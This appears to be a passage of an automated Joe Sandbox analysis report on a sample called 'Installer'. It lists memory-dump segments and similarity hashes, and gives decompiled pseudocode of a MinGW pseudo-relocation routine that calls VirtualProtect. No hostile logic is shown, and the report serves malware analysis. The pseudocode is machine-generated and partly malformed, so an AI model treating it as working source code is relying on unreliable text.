                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: signal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1946981877-0
                                                                                                                                                                    • Opcode ID: 41d68276068a57f6d310b595e620609d0df5fff0df1b86f9955e52f11d4fa43c
                                                                                                                                                                    • Instruction ID: d43d44eaca1fed08efbaad7cf5919389b27823aff766ab4bdf4b8539708e25a4
                                                                                                                                                                    • Opcode Fuzzy Hash: 41d68276068a57f6d310b595e620609d0df5fff0df1b86f9955e52f11d4fa43c
                                                                                                                                                                    • Instruction Fuzzy Hash: C3312170108620EAD7206FB8A54532E76E07B65324F214F09E4E5C77D1D7BEC9E49753
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121EB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 327 121eb0-121ec3 328 121ed0-121f19 call 1227d0 call 1229c0 327->328 329 121ec5-121ecc 327->329 328->329 334 121f1b-121f24 328->334 335 121fd0-121fd2 334->335 336 121f2a 334->336 337 122120 335->337 338 121fd8-121fe5 335->338 339 121f2f-121f31 336->339 340 122125-12212b 337->340 341 122160 338->341 342 121feb-121ff6 338->342 339->340 343 121f37-121f3c 339->343 340->329 344 122131-122156 call 121d50 340->344 346 12216a-122196 call 121cf0 341->346 342->339 343->340 345 121f42-121f48 343->345 353 122158 344->353 345->346 347 121f4e-121f57 345->347 355 1221c1-1221c5 346->355 356 122198-1221bf 346->356 347->329 349 121f5d 347->349 352 121f60-121f8b 349->352 357 122020-12203d 352->357 358 121f91-121f94 352->358 359 122070-122077 353->359 362 1221c7-1221ca 355->362 356->362 360 122057-12205e call 121d50 357->360 361 12203f-122045 357->361 363 122000-122003 358->363 364 121f96-121fa0 358->364 359->329 365 12207d-122089 359->365 385 122061-12206a 360->385 366 12204b-122051 361->366 367 121fae-121fcb call 121cf0 361->367 373 1220d0-1220e8 363->373 374 122009-12201c call 121cf0 363->374 370 122110-122119 call 121d50 364->370 371 121fa6-121fa8 364->371 372 122090-1220a0 365->372 366->360 366->367 367->335 370->385 371->367 371->370 378 1220a2-1220b9 VirtualProtect 372->378 379 1220bc-1220c5 372->379 380 1220ea-1220ed 373->380 381 1220ff-12210a call 121d50 373->381 374->357 378->379 379->372 386 1220c7-1220ce 379->386 380->367 387 1220f3-1220f9 380->387 381->385 385->352 385->359 387->367 387->381
                                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                                    			E00121EB0(signed char* __ebx, void* __edi, signed int __esi) {
				void* _v16;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v57;
				signed int _v60;
				long long _v64;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v132;
				char _v136;
				signed int _t66;
				void* _t72;
				int _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr _t84;
				signed char _t85;
				signed int _t98;
				intOrPtr _t104;
				signed int _t107;
				signed int _t109;
				signed int* _t117;
				signed int _t118;
				signed int* _t120;
				signed int _t123;
				intOrPtr _t124;
				char* _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				void* _t140;
				void* _t141;
				char** _t142;
				intOrPtr* _t145;
				long long _t150;

				_t121 = __esi;
				_t96 = __ebx;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t141 = _t140 - 0x4c;
				_t66 =  *0x151068;
				_v56 = _t66;
				if(_t66 == 0) {
					 *0x151068 = 1;
					_t72 = E001229C0(0x1b + (E001227D0() + _t67 * 4) * 4 >> 4 << 4);
					 *0x15106c = 0;
					_t142 = _t141 - _t72;
					 *0x151070 =  &_v57 & 0xfffffff0;
					_t66 = 0;
					__eflags = 0x14fdb8 - 7;
					if(0x14fdb8 <= 7) {
						goto L1;
					} else {
						_t107 =  *0x14fdb8; // 0x0
						__eflags = 0x14fdb8 - 0xb;
						if(0x14fdb8 > 0xb) {
							L16:
							__eflags = _t107;
							if(_t107 != 0) {
								_t117 = 0x14fdb8;
								goto L38;
							} else {
								_t66 =  *0x14fdbc; // 0x0
								__eflags = _t66 |  *0x14fdc0;
								if((_t66 |  *0x14fdc0) != 0) {
									_t117 = 0x14fdb8;
									goto L7;
								} else {
									_t107 =  *0x14fdc4; // 0x0
									_t117 = 0x14fdc4;
									goto L5;
								}
							}
						} else {
							_t117 = 0x14fdb8;
							L5:
							__eflags = _t107;
							if(_t107 != 0) {
								L38:
								__eflags = _t117 - 0x14fdb8;
								if(_t117 >= 0x14fdb8) {
									goto L1;
								} else {
									do {
										_t50 =  &(_t117[1]); // 0x0
										_t98 =  *_t50;
										_t123 =  *_t117;
										_t117 =  &(_t117[2]);
										_t51 = _t98 + 0x120000; // 0x905a4d
										_t124 = _t123 +  *_t51;
										_t52 = _t98 + 0x120000; // 0x120000
										E00121D50(_t52, _t98, _t117, _t124);
										 *((intOrPtr*)(_t98 + 0x120000)) = _t124;
										__eflags = _t117 - 0x14fdb8;
									} while (_t117 < 0x14fdb8);
									goto L26;
								}
							} else {
								_t8 =  &(_t117[1]); // 0x0
								_t66 =  *_t8;
								L7:
								__eflags = _t66;
								if(_t66 != 0) {
									goto L38;
								} else {
									_t9 =  &(_t117[2]); // 0x0
									_t66 =  *_t9;
									__eflags = _t66 - 1;
									if(__eflags != 0) {
										_v88 = _t66;
										 *_t142 = "  Unknown pseudo relocation protocol version %d.\n";
										E00121CF0(_t96, _t117, _t121, __eflags);
										_t145 = _t142 - 0x3c;
										_t82 =  *0x151074;
										_t150 = _v64;
										__eflags = _t82;
										if(_t82 == 0) {
											st0 = _t150;
											st0 = _t150;
											st0 = _t150;
										} else {
											asm("fxch st0, st2");
											_v128 = _t150;
											_v120 = _t150;
											_v136 = _v88;
											_v112 = _t150;
											_v132 = _v84;
											 *_t145 =  &_v136;
											_t82 =  *_t82();
										}
										return _t82;
									} else {
										_t120 =  &(_t117[3]);
										__eflags = _t120 - 0x14fdb8;
										if(_t120 >= 0x14fdb8) {
											goto L1;
										} else {
											do {
												_t83 =  *_t120;
												_t10 =  &(_t120[1]); // 0x0
												_t107 =  *_t10;
												_t11 = _t83 + 0x120000; // 0x120000
												_t12 = _t83 + 0x120000; // 0x905a4d
												_t84 =  *_t12;
												_t13 = _t107 + 0x120000; // 0x120000
												_t96 = _t13;
												_v48 = _t11;
												_v52 = _t84;
												_t104 = _t84;
												_t16 =  &(_t120[2]); // 0x0
												_t85 =  *_t16;
												_t127 = _t85 & 0x000000ff;
												_v60 = _t127;
												__eflags = _t127 - 0x10;
												if(_t127 == 0x10) {
													L21:
													_t30 = _t107 + 0x120000; // 0x905a4d
													_t128 =  *_t30 & 0x0000ffff;
													__eflags = _t128;
													_t129 =  <  ? _t128 | 0xffff0000 : _t128;
													_t130 = ( <  ? _t128 | 0xffff0000 : _t128) - _v48;
													_t121 = ( <  ? _t128 | 0xffff0000 : _t128) - _v48 + _v52;
													__eflags = _t85 & 0x000000e0;
													if((_t85 & 0x000000e0) != 0) {
														L24:
														E00121D50(_t96, _t96, _t120, _t121);
														 *_t96 = _t121;
														goto L25;
													} else {
														__eflags = _t121 - 0xffff8000;
														if(__eflags < 0) {
															goto L15;
														} else {
															__eflags = _t121 - 0xffff;
															if(__eflags > 0) {
																goto L15;
															} else {
																goto L24;
															}
														}
													}
												} else {
													__eflags = _t127 - 0x20;
													if(_t127 != 0x20) {
														__eflags = _t127 - 8;
														if(__eflags == 0) {
															_t131 =  *_t96 & 0x000000ff;
															_t107 = _t131 | 0xffffff00;
															__eflags =  *_t96;
															_t132 =  <  ? _t107 : _t131;
															_t133 = ( <  ? _t107 : _t131) - _v48;
															_t121 = ( <  ? _t107 : _t131) - _v48 + _t104;
															__eflags = _t85 & 0x000000e0;
															if((_t85 & 0x000000e0) != 0) {
																L35:
																E00121D50(_t96, _t96, _t120, _t121);
																 *_t96 = _t121;
																goto L25;
															} else {
																__eflags = _t121 - 0xffffff80;
																if(__eflags < 0) {
																	goto L15;
																} else {
																	__eflags = _t121 - 0xff;
																	if(__eflags > 0) {
																		goto L15;
																	} else {
																		goto L35;
																	}
																}
															}
														} else {
															 *_t142 = "  Unknown pseudo relocation bit size %d.\n";
															_v88 = _v60;
															_t85 = E00121CF0(_t96, _t120, _t127, __eflags);
															goto L21;
														}
													} else {
														_t121 = _v52 - _v48 +  *_t96;
														__eflags = _t85 & 0x000000e0;
														if((_t85 & 0x000000e0) != 0) {
															L36:
															E00121D50(_t96, _t96, _t120, _t121);
															 *_t96 = _t121;
															goto L25;
														} else {
															__eflags = _t121;
															if(__eflags < 0) {
																goto L36;
															} else {
																L15:
																_v76 = _t121;
																_v84 = _t96;
																_v80 = _v52;
																 *_t142 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\n";
																_v88 = _v60;
																_t66 = E00121CF0(_t96, _t120, _t121, __eflags);
																goto L16;
															}
														}
													}
												}
												goto L46;
												L25:
												_t120 =  &(_t120[3]);
												__eflags = _t120 - 0x14fdb8;
											} while (_t120 < 0x14fdb8);
											L26:
											_t66 =  *0x15106c;
											__eflags = _t66;
											if(_t66 <= 0) {
												goto L1;
											} else {
												_t118 = _v56;
												_t125 =  &_v32;
												do {
													_t79 =  *0x151070 + (_t118 + _t118 * 4) * 4;
													_t109 =  *_t79;
													__eflags = _t109;
													if(_t109 != 0) {
														_v80 = _t125;
														_v84 = _t109;
														_v88 =  *(_t79 + 8);
														 *_t142 =  *(_t79 + 4);
														_t79 = VirtualProtect(??, ??, ??, ??);
														_t142 = _t142 - 0x10;
													}
													_t118 = _t118 + 1;
													__eflags = _t118 -  *0x15106c;
												} while (_t118 <  *0x15106c);
												return _t79;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return _t66;
				}
				L46:
			}














































                                                                                                                                                                    0x00121eb0
                                                                                                                                                                    0x00121eb0
                                                                                                                                                                    0x00121eb3
                                                                                                                                                                    0x00121eb4
                                                                                                                                                                    0x00121eb5
                                                                                                                                                                    0x00121eb6
                                                                                                                                                                    0x00121eb9
                                                                                                                                                                    0x00121ebe
                                                                                                                                                                    0x00121ec3
                                                                                                                                                                    0x00121ed0
                                                                                                                                                                    0x00121eef
                                                                                                                                                                    0x00121ef4
                                                                                                                                                                    0x00121efe
                                                                                                                                                                    0x00121f07
                                                                                                                                                                    0x00121f11
                                                                                                                                                                    0x00121f16
                                                                                                                                                                    0x00121f19
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121f1b
                                                                                                                                                                    0x00121f1b
                                                                                                                                                                    0x00121f21
                                                                                                                                                                    0x00121f24
                                                                                                                                                                    0x00121fd0
                                                                                                                                                                    0x00121fd0
                                                                                                                                                                    0x00121fd2
                                                                                                                                                                    0x00122120
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121fd8
                                                                                                                                                                    0x00121fd8
                                                                                                                                                                    0x00121fdf
                                                                                                                                                                    0x00121fe5
                                                                                                                                                                    0x00122160
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121feb
                                                                                                                                                                    0x00121feb
                                                                                                                                                                    0x00121ff1
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121ff1
                                                                                                                                                                    0x00121fe5
                                                                                                                                                                    0x00121f2a
                                                                                                                                                                    0x00121f2a
                                                                                                                                                                    0x00121f2f
                                                                                                                                                                    0x00121f2f
                                                                                                                                                                    0x00121f31
                                                                                                                                                                    0x00122125
                                                                                                                                                                    0x00122125
                                                                                                                                                                    0x0012212b
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122131
                                                                                                                                                                    0x00122131
                                                                                                                                                                    0x00122131
                                                                                                                                                                    0x00122131
                                                                                                                                                                    0x00122134
                                                                                                                                                                    0x00122136
                                                                                                                                                                    0x00122139
                                                                                                                                                                    0x00122139
                                                                                                                                                                    0x0012213f
                                                                                                                                                                    0x00122145
                                                                                                                                                                    0x0012214a
                                                                                                                                                                    0x00122150
                                                                                                                                                                    0x00122150
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122158
                                                                                                                                                                    0x00121f37
                                                                                                                                                                    0x00121f37
                                                                                                                                                                    0x00121f37
                                                                                                                                                                    0x00121f3a
                                                                                                                                                                    0x00121f3a
                                                                                                                                                                    0x00121f3c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121f42
                                                                                                                                                                    0x00121f42
                                                                                                                                                                    0x00121f42
                                                                                                                                                                    0x00121f45
                                                                                                                                                                    0x00121f48
                                                                                                                                                                    0x0012216a
                                                                                                                                                                    0x0012216e
                                                                                                                                                                    0x00122175
                                                                                                                                                                    0x00122180
                                                                                                                                                                    0x00122183
                                                                                                                                                                    0x00122190
                                                                                                                                                                    0x00122194
                                                                                                                                                                    0x00122196
                                                                                                                                                                    0x001221c1
                                                                                                                                                                    0x001221c3
                                                                                                                                                                    0x001221c5
                                                                                                                                                                    0x00122198
                                                                                                                                                                    0x00122198
                                                                                                                                                                    0x0012219e
                                                                                                                                                                    0x001221a2
                                                                                                                                                                    0x001221a6
                                                                                                                                                                    0x001221ae
                                                                                                                                                                    0x001221b2
                                                                                                                                                                    0x001221ba
                                                                                                                                                                    0x001221bd
                                                                                                                                                                    0x001221bd
                                                                                                                                                                    0x001221ca
                                                                                                                                                                    0x00121f4e
                                                                                                                                                                    0x00121f4e
                                                                                                                                                                    0x00121f51
                                                                                                                                                                    0x00121f57
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121f60
                                                                                                                                                                    0x00121f60
                                                                                                                                                                    0x00121f60
                                                                                                                                                                    0x00121f62
                                                                                                                                                                    0x00121f62
                                                                                                                                                                    0x00121f65
                                                                                                                                                                    0x00121f6b
                                                                                                                                                                    0x00121f6b
                                                                                                                                                                    0x00121f71
                                                                                                                                                                    0x00121f71
                                                                                                                                                                    0x00121f77
                                                                                                                                                                    0x00121f7a
                                                                                                                                                                    0x00121f7d
                                                                                                                                                                    0x00121f7f
                                                                                                                                                                    0x00121f7f
                                                                                                                                                                    0x00121f82
                                                                                                                                                                    0x00121f85
                                                                                                                                                                    0x00121f88
                                                                                                                                                                    0x00121f8b
                                                                                                                                                                    0x00122020
                                                                                                                                                                    0x00122020
                                                                                                                                                                    0x00122020
                                                                                                                                                                    0x0012202f
                                                                                                                                                                    0x00122032
                                                                                                                                                                    0x00122035
                                                                                                                                                                    0x00122038
                                                                                                                                                                    0x0012203b
                                                                                                                                                                    0x0012203d
                                                                                                                                                                    0x00122057
                                                                                                                                                                    0x00122059
                                                                                                                                                                    0x0012205e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012203f
                                                                                                                                                                    0x0012203f
                                                                                                                                                                    0x00122045
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012204b
                                                                                                                                                                    0x0012204b
                                                                                                                                                                    0x00122051
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122051
                                                                                                                                                                    0x00122045
                                                                                                                                                                    0x00121f91
                                                                                                                                                                    0x00121f91
                                                                                                                                                                    0x00121f94
                                                                                                                                                                    0x00122000
                                                                                                                                                                    0x00122003
                                                                                                                                                                    0x001220d0
                                                                                                                                                                    0x001220d5
                                                                                                                                                                    0x001220db
                                                                                                                                                                    0x001220de
                                                                                                                                                                    0x001220e1
                                                                                                                                                                    0x001220e4
                                                                                                                                                                    0x001220e6
                                                                                                                                                                    0x001220e8
                                                                                                                                                                    0x001220ff
                                                                                                                                                                    0x00122101
                                                                                                                                                                    0x00122108
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001220ea
                                                                                                                                                                    0x001220ea
                                                                                                                                                                    0x001220ed
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001220f3
                                                                                                                                                                    0x001220f3
                                                                                                                                                                    0x001220f9
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001220f9
                                                                                                                                                                    0x001220ed
                                                                                                                                                                    0x00122009
                                                                                                                                                                    0x0012200c
                                                                                                                                                                    0x00122013
                                                                                                                                                                    0x00122017
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122017
                                                                                                                                                                    0x00121f96
                                                                                                                                                                    0x00121f9c
                                                                                                                                                                    0x00121f9e
                                                                                                                                                                    0x00121fa0
                                                                                                                                                                    0x00122110
                                                                                                                                                                    0x00122112
                                                                                                                                                                    0x00122117
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121fa6
                                                                                                                                                                    0x00121fa6
                                                                                                                                                                    0x00121fa8
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121fae
                                                                                                                                                                    0x00121fae
                                                                                                                                                                    0x00121fb1
                                                                                                                                                                    0x00121fb5
                                                                                                                                                                    0x00121fb9
                                                                                                                                                                    0x00121fc0
                                                                                                                                                                    0x00121fc7
                                                                                                                                                                    0x00121fcb
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121fcb
                                                                                                                                                                    0x00121fa8
                                                                                                                                                                    0x00121fa0
                                                                                                                                                                    0x00121f94
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122061
                                                                                                                                                                    0x00122061
                                                                                                                                                                    0x00122064
                                                                                                                                                                    0x00122064
                                                                                                                                                                    0x00122070
                                                                                                                                                                    0x00122070
                                                                                                                                                                    0x00122075
                                                                                                                                                                    0x00122077
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012207d
                                                                                                                                                                    0x00122083
                                                                                                                                                                    0x00122086
                                                                                                                                                                    0x00122090
                                                                                                                                                                    0x00122099
                                                                                                                                                                    0x0012209c
                                                                                                                                                                    0x0012209e
                                                                                                                                                                    0x001220a0
                                                                                                                                                                    0x001220a2
                                                                                                                                                                    0x001220a6
                                                                                                                                                                    0x001220ad
                                                                                                                                                                    0x001220b4
                                                                                                                                                                    0x001220b7
                                                                                                                                                                    0x001220b9
                                                                                                                                                                    0x001220b9
                                                                                                                                                                    0x001220bc
                                                                                                                                                                    0x001220bf
                                                                                                                                                                    0x001220bf
                                                                                                                                                                    0x001220ce
                                                                                                                                                                    0x001220ce
                                                                                                                                                                    0x00122077
                                                                                                                                                                    0x00121f57
                                                                                                                                                                    0x00121f48
                                                                                                                                                                    0x00121f3c
                                                                                                                                                                    0x00121f31
                                                                                                                                                                    0x00121f24
                                                                                                                                                                    0x00121ec5
                                                                                                                                                                    0x00121ec5
                                                                                                                                                                    0x00121ecc
                                                                                                                                                                    0x00121ecc
                                                                                                                                                                    0x00000000

                                                                                                                                                                    Strings
                                                                                                                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00121FC0
                                                                                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 0012216E
                                                                                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 0012200C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                    • API String ID: 0-1286557213
